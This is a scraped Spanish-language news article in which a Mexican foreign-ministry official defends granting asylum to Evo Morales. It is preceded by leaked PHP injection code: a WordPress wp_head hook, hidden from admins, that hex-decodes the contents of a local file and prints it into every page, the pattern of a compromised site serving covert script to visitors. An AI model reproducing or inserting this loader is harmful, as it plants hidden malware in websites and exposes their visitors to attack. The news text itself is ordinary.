if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Dar asilo a Evo Morales no es una decisión arbitraria sino diplomática: Alonso Cabrera – La Opinión Universitaria La Opinión Universitaria
Menu

Dar asilo a Evo Morales no es una decisión arbitraria sino diplomática: Alonso Cabrera

 

  • El representante de la Secretaria de Relaciones Exteriores reiteró que México no intervendrá en las decisiones del ex presidente de Bolivia

Por Diego Cuautle

Ante las críticas que ha recibido el gobierno mexicano por otorgar asilo al ex presidente de Bolivia, Evo Morales, Gustavo Alonso Cabrera. Director General de Cooperación Técnica y Científica de la Secretaria de Relaciones Exteriores (SRE), señaló que la decisión no fue arbitraria como se ha dicho sino diplomática y sobre todo humanitaria.

En entrevista luego de la inauguración de la Cumbre Regional de Política Exterior que realizó el Institución de Ciencias Jurídicas (ICI) de Puebla en el Auditorio de San Pero Cholula, aceptó que los diferentes sectores de la sociedad no estén de acuerdo ante dicha situación.

“En efecto, hay sectores que no están de acuerdo a la decisión, pero es parte de la dinámica de la nueva sociedad en la que estamos trabajando y viviendo donde se respeta la opinión, pero de otra manera son decisiones que están soportadas en la constitución”, sentenció.

En este sentido, agregó que se está en una etapa de transformación y se están haciendo las cosas de otra manera, aunque dijo, “lo que México ha venido realizando es de general el asilo como una alternativa para evitar un conflicto mayor o en este caso la perdida de vida de la persona que se le otorgó ese derecho”.

Destacó que el gobierno mexicano únicamente ofreció asilo como una forma de garantizar que su libertad está custodiada ya que no hay el interés y facultadas de poder intervenir en las decisiones que en lo personal va a tomar, ofrecemos un espacio de libertad.

Al ser cuestionado de si con esta nueva manera de hacer política internacional por parte del actual gobierno, el representante de la SRE, explicó que “lo ha dicho el propio Andrés Manuel López Obrador, en las dos últimas décadas se volteó demasiado hacia el norte y se olvidó el sur como parte de una estrategia regional. Mas que recuperar el liderazgo estamos reconstruyendo muchos de los lazos que nos llevan a mantener una estrategia como continente y región”.

Es por ello que “respetamos las decisiones electorales de cada uno de los países. No tenemos la intención de intervenir porque no es de nuestra facultad sino establecer estrategia de cooperación regional. Es general programas y proyectos cuyas condiciones permitan tener a los ciudadanos una mejor expectativa de desarrollo, de vida y aspiración a quedarse en su país como todos tenemos derecho”.

Sobre las declaraciones de Janine Añez, autoproclamada presidente de Bolivia y quien recientemente señaló que le “daba pena los mexicanos… ojalá que México, ojalá que los mexicanos no pasen estas situaciones tan desafortunadas que hemos pasado”, Alonso Cabrera expresó que son opiniones respetables,”nosotros actuamos conforme a la actuación política a cada personaje sobre cualquier situación económica, política, religiosa y de carácter sexual”.

“La política internacional del México está abierta para todos, se ha hecho el recuento. Cotidianamente las embajadas de México reciben solicitudes de visas y residencias. En el caso del asilo es aceptada cuando su situación es riesgosa. No necesariamente tiene que ser un líder o presidente sino que cualquier persona que lo solicite como parte de las relaciones políticas que se tienen”, reiteró.

Finalmente dijo que el gobierno mexicano le ofrece un espacio de libertad a Evo Morales, donde los derechos humanos estén garantizados y ya el decidirla su camino a seguir y como todo precepto de política internacional, se respeta la vida interna de Bolivia y él también respeta la de México.

 

No comments

Deja una respuesta

Tweets recientes